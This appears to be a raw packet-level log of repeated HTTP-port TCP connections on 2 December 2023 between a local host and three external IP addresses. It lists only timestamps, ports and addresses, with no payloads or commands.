                                                                        Dec 2, 2023 18:51:20.453620911 CET804974585.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:20.453897953 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:20.454240084 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:20.675563097 CET804974585.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:20.737898111 CET804974585.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:20.738049984 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:21.961494923 CET4974580192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:22.977411985 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:23.200027943 CET804974685.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:23.200203896 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:23.200404882 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:23.421757936 CET804974685.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:23.484241962 CET804974685.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:23.484343052 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:24.954361916 CET4974680192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:26.648267031 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:26.871162891 CET804974785.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:26.871258974 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:26.871557951 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:27.093024015 CET804974785.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:27.153484106 CET804974785.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:27.155056000 CET804974785.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:27.155147076 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:28.383369923 CET4974780192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.399389982 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.623025894 CET804974885.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:29.623197079 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.623502016 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.848659992 CET804974885.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:29.848989964 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:29.849419117 CET4974880192.168.2.1085.159.66.93
                                                                        Dec 2, 2023 18:51:30.073391914 CET804974885.159.66.93192.168.2.10
                                                                        Dec 2, 2023 18:51:35.115281105 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:35.304783106 CET8049749162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:35.304996967 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:35.305404902 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:35.497416019 CET8049749162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:35.506577969 CET8049749162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:35.506777048 CET8049749162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:35.506958008 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:36.820709944 CET4974980192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:37.837029934 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:38.028392076 CET8049750162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:38.028513908 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:38.028748989 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:38.217689037 CET8049750162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:38.231230974 CET8049750162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:38.231465101 CET8049750162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:38.231525898 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:39.539578915 CET4975080192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:40.555996895 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:40.748784065 CET8049751162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:40.748889923 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:40.749174118 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:40.938920021 CET8049751162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:40.952306032 CET8049751162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:40.952548027 CET8049751162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:40.952725887 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:42.265913010 CET4975180192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.472038984 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.660443068 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:44.660608053 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.660860062 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.848968983 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:44.861386061 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:44.861771107 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:44.861960888 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:44.862195015 CET4975280192.168.2.10162.241.252.161
                                                                        Dec 2, 2023 18:51:45.050179958 CET8049752162.241.252.161192.168.2.10
                                                                        Dec 2, 2023 18:51:50.535861015 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:50.721146107 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:50.721328974 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:50.721636057 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:50.906644106 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892266989 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892296076 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892307043 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892316103 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892401934 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:51.892493963 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892513037 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892524958 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892538071 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892549992 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892558098 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:51.892565966 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892582893 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:51.892617941 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.077836037 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077862024 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077877045 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077889919 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077909946 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077914000 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.077923059 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077939034 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077949047 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.077953100 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077966928 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077977896 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.077980042 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077994108 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078003883 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078012943 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078022957 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078026056 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078038931 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078051090 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078078985 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078105927 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078119040 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078130960 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078146935 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078161001 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078181028 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078212976 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078298092 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078332901 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.227066040 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263075113 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263103962 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263119936 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263135910 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263149977 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263164043 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263178110 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263195992 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263210058 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263221979 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263235092 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263247967 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263262987 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263355970 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263369083 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263401031 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263458014 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263482094 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263498068 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263550997 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263664007 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263679028 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263694048 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263708115 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263729095 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263781071 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263801098 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263864040 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263931036 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263943911 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263959885 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263994932 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264075994 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264255047 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264269114 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264323950 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264395952 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264411926 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264422894 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264436007 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264475107 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264482021 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264497995 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264528990 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264590979 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264609098 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264669895 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264725924 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264786959 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264884949 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264899969 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264913082 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264929056 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.264964104 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.264972925 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.265028954 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.265048027 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.265098095 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.265285969 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.265355110 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:53.243040085 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:53.426476955 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:53.426611900 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:53.427474022 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:53.610943079 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.575953007 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.575974941 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.575989008 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.576003075 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.576016903 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.576030970 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.576045036 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.576056957 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.576070070 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.576082945 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.576167107 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.576168060 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.576168060 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.759723902 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759752035 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759763002 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759800911 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759814978 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759829044 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759828091 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.759841919 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759855986 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759869099 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759882927 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759896994 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759908915 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759922981 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759936094 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.759982109 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.759982109 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.759982109 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.759982109 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.759982109 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.759982109 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.760050058 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.760073900 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.760118008 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.760185003 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.760272026 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.760284901 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.760297060 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.760319948 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.760339022 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.930258036 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.943515062 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943543911 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943557024 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943568945 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943583012 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943597078 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943609953 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943624020 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943636894 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943651915 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943676949 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943691015 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943702936 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943717003 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943732023 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943744898 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943742037 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.943742990 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.943742990 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.943742990 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.943768024 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943775892 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.943782091 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943789005 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.943808079 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.943921089 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.943959951 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944019079 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944032907 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944045067 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944057941 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944071054 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944082975 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944083929 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944107056 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944117069 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944140911 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944297075 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944310904 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944333076 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944344997 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944381952 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944416046 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944466114 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944502115 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944658041 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944670916 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944681883 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944694042 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944694996 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944714069 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944729090 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944752932 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944766045 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944788933 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944813013 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.944896936 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944911003 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.944938898 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.945074081 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.945106030 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.945152044 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.945178986 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.945183992 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.945198059 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.945209980 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.945221901 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.945252895 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:54.945374012 CET8049754185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:54.945421934 CET4975480192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:55.946281910 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:56.129414082 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:56.129547119 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:56.129822969 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:56.312973976 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:56.313002110 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.526902914 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.526925087 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.526937008 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.526949883 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.527004004 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.527018070 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.527030945 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.527072906 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.527085066 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.527091980 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.527100086 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.527190924 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.637270927 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710216045 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710239887 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710253000 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710329056 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710341930 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710355043 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710367918 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710380077 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710392952 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710406065 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710419893 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710432053 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710570097 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710570097 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710592031 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710608006 CET8049755185.74.252.11192.168.2.10
